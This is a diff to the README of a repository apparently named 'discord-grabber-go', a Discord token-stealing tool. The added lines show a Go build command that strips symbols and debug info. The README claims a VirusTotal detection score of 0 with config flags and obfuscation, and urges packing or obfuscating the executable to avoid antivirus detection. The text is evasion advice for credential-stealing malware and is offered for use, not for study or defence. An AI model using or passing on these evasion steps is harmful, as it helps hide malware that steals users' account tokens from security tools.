faceslog/discord-grabber-go/README.md

 # You can avoid this by using specific config flags that I won't provide here !
 # with the correct config flags + some obfuscation the score on Virus Total is 0
 go build main.go
+# By default, go build combines symbol and debug info with binary files.
+# However, you can remove the symbol and debug info with
+go build -ldflags "-s -w"
 ```
 You should probably obfuscate or pack the executable file to avoid being detected by AVs.